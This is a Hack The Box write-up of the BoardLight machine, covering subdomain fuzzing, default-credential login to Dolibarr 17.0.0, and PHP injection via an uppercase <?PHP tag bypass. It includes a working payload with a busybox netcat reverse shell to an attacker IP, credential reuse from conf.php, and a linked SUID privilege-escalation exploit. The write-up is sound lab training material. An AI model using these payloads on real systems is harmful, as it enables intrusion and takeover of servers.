> For the complete documentation index, see [llms.txt](https://0xb0b.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xb0b.gitbook.io/writeups/hackthebox/2024/boardlight.md).

# BoardLight

Created by cY83rR0H1t

{% embed url="<https://app.hackthebox.com/machines/BoardLight>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Summary

In this challenge, we exploited a vulnerability in Dolibarr CRM (version 17.0.0), allowing us to execute PHP code via an unsanitized input in the websites module. After gaining access as `www-data`, we discovered credentials in the `conf.php` file and reused them to log in as `larissa` via SSH. Further enumeration revealed custom SUID binaries, which we exploited to escalate privileges to root and retrieve the final flag.

## Recon

We start with an Nmap scan and find only two open ports. We have SSH available on port `22` and an Apache web server is running on port `80`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FRehkb7Lxp1J4WfdKDOPT%2Fimage.png?alt=media&amp;token=a5e36df1-8ed5-4c58-825d-e1687e24838e" alt=""><figcaption></figcaption></figure>

When visiting the end point, we only find a static page.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F0KVeXLV8AFq1qwTYJYbJ%2Fimage.png?alt=media&amp;token=4cf3ec6c-3e35-43cf-b755-6c7d6ff75715" alt=""><figcaption></figcaption></figure>

Our directory scan with Feroxbuster also seems to confirm this. However, we also see that this is a PHP server.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7feFWOwnCQ26qIiEEue0%2Fimage.png?alt=media&amp;token=55693cab-6fa2-4669-b0ea-db1ff2835adc" alt=""><figcaption></figcaption></figure>

But we still find something useful on the static page. In the 'About Shop' section, we find an info mail that reveals a domain. We add this to our `/etc/hosts`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FNXH2QglOokXXfanvnJcr%2Fimage.png?alt=media&amp;token=6b8e703b-2612-4d21-b405-50b226fa1034" alt=""><figcaption></figcaption></figure>

With a sub domain scan using FFuF  we find the subdomain `crm`.

{% code overflow="wrap" %}

```
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://board.htb/ -H "Host:FUZZ.board.htb" -fw 6243
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Ft6PI10x6m1kHrECSZCkJ%2Fimage.png?alt=media&amp;token=a9eee582-3a1f-4e1f-9ad7-423e4c95289e" alt=""><figcaption></figcaption></figure>

Dolibarr is an open-source ERP (Enterprise Resource Planning) and CRM (Customer Relationship Management) software designed to help businesses manage various operations like sales, inventory, and accounting. In version `17.0.0`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fg6uuEf1uI08JOexmbcbJ%2Fimage.png?alt=media&amp;token=881b0119-d83d-4c82-8c97-1e57b0a0622d" alt=""><figcaption></figcaption></figure>

## Shell As www-data

We try to log in with default credentials and are successful.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FDcxEmUJA8LhSnBKlLWJb%2Fimage.png?alt=media&amp;token=9e686854-3255-4266-9a21-41d72adef408" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F1FJs5L8My16qcB6y2Gpa%2Fimage.png?alt=media&amp;token=41bc6486-0232-485c-b7b8-c010b112cf28" alt=""><figcaption></figcaption></figure>

We also find a suitable exploit for version 17.0.1 that allows us to execute remote code.

{% embed url="<https://github.com/advisories/GHSA-9wqr-5jp4-mjmh>" %}

> Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: \<?PHP instead of \<?php in injected data.

{% embed url="<https://starlabs.sg/advisories/23/23-4197/>" %}

> ### Vulnerability Summary:
>
> Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for `<?php` and `<?=`, allowing usage of the `<?` short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP

To exploit this vulnerability, we create a website as shown below.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fct5xGQG6RASu6N46BZwG%2Fimage.png?alt=media&amp;token=a21dd3f9-d0d8-45ed-bc1e-b3d0e297f165" alt=""><figcaption></figcaption></figure>

We are adding a new page to this:

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FXkiTO7CuGU3KuJ7tWHZy%2Fimage.png?alt=media&amp;token=d622eb90-5154-409f-ba7d-ffdf9094aa14" alt=""><figcaption></figcaption></figure>

We then have to define a title and a page namealias.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F6B4VjJVzRZx3cx4H2hY4%2Fimage.png?alt=media&amp;token=a161d0bb-df04-480b-aa48-39ed3fa81cf8" alt=""><figcaption></figcaption></figure>

After we have created the page, we edit the source using '`Edit HTML Source`'.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FZ9q5ZPSGqj83QenSQAB7%2Fimage.png?alt=media&amp;token=4f094c47-d254-4108-b952-b6c39df32728" alt=""><figcaption></figcaption></figure>

To verify that we are successful with the exploit, we first use a simple command to check whether we are successful.

```
<!-- Enter here your HTML content. Add a section with an id tag and tag contenteditable="true" if you want to use the inline editor for the content  -->
<section id="mysection1" contenteditable="true">
<?PHP echo system("whoami"); ?>
</section>
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FsURmPFjXR4Kb85M620Ek%2Fimage.png?alt=media&amp;token=bccf3d3b-7e9a-4df3-9154-113acb2f5627" alt=""><figcaption></figcaption></figure>

By clicking on the binoculars we are redirected to our created page.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fm8KnRTuhK9KD96fEMM1V%2Fimage.png?alt=media&amp;token=146abdfd-739e-4869-8ef0-858dfca3701c" alt=""><figcaption></figcaption></figure>

&#x20;We that the command got succesfully executed.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FAsQ0TVQJwF6nowWR8kmX%2Fimage.png?alt=media&amp;token=eaa7ca7c-56e7-473c-80f1-a4a24d5a3f07" alt=""><figcaption></figcaption></figure>

Next, we set up a listener.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FTBPlqkeIqPEIdYfMuqkG%2Fimage.png?alt=media&amp;token=4e6e2d11-c874-41a4-84e5-cac5f8a749b6" alt=""><figcaption></figcaption></figure>

And prepare a payload for a reverse shell using `busybox`.

```
<!-- Enter here your HTML content. Add a section with an id tag and tag contenteditable="true" if you want to use the inline editor for the content  -->
<section id="mysection1" contenteditable="true">
<?PHP echo system("busybox nc 10.10.14.54 80 -e /bin/bash"); ?>
</section>
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FrVTzDLJxp6EcEAbIbgba%2Fimage.png?alt=media&amp;token=17b5acb1-29d9-4d89-a88b-beec812bd421" alt=""><figcaption></figcaption></figure>

After previewing the page we get a connection back. We are `www-data`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F87Um4yus4VbVuZLenFTT%2Fimage.png?alt=media&amp;token=838a9431-02a3-4639-b885-c3e86ffb9af2" alt=""><figcaption></figcaption></figure>

## Shell as larissa

When enumerating as `www-data`, we see that the board page belongs to larissa. Maybe we can find useful credentials in one of the config files.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FjG9uHxSyPZIu115u5Oei%2Fimage.png?alt=media&amp;token=905739e3-6644-4451-b196-092152b7fc1c" alt=""><figcaption></figcaption></figure>

We search for the config file conf.php and find it in `/var/www/html/crm.board.htb/htdocs/conf/conf.php`.

```
find / -type f -name "conf.php" 2>/dev/null
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FZs1O8qUkW93IvoNpWFTz%2Fimage.png?alt=media&amp;token=0c87f19b-b9e1-47d6-8da6-fe14b9f7d1fb" alt=""><figcaption></figcaption></figure>

In this we find the credentials for the database user.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FFDDhtebDjdjbnPAHcVEC%2Fimage.png?alt=media&amp;token=c1438da5-4176-45cd-9352-25295d8d3fb7" alt=""><figcaption></figcaption></figure>

Fortunately, at least in our case, the credentials were reused. With this password, which we found in `conf.php`, we can gain access to the machine as `larissa` via ssh. In the home directory of `larsissa` we find the first flag.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FdxmyL5Rr0Osc3nd0WdTH%2Fimage.png?alt=media&amp;token=452dd45b-d4fb-4095-ac46-1cae6c671b7d" alt=""><figcaption></figcaption></figure>

## Shell as root

When enumerating with `larsissa`, the suid binaries stand out. They match the name of the box. These are not the usual binaries found in GTFObins. But they may have vulnerabilities to get a `root` shell using them.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F1ILvEm7zb6V59HtXFwRT%2Fimage.png?alt=media&amp;token=2570d208-3d0d-4825-9817-7488c3fe2de0" alt=""><figcaption></figcaption></figure>

We are able to locate the following exploits of which the latter one actually works.

{% embed url="<https://www.exploit-db.com/exploits/51180>" %}

{% embed url="<https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit>" %}

We clone the repository and setup a Python web server to provide the files, alternatively we could have used `scp`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7b8fOeRtcTi87a3BY1yC%2Fimage.png?alt=media&amp;token=95bcfd65-05bd-4fc8-b8a0-5d82c1050d43" alt=""><figcaption></figcaption></figure>

Next, we just need to download the exploit, change the permission of the script to make it executable and execute it. We are `root` and find the last flag at `/root/root.txt`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FjAKzApoMdnYRS2rTegkI%2Fimage.png?alt=media&amp;token=0455c1ea-3b1c-4945-be71-39638b18378b" alt=""><figcaption></figcaption></figure>
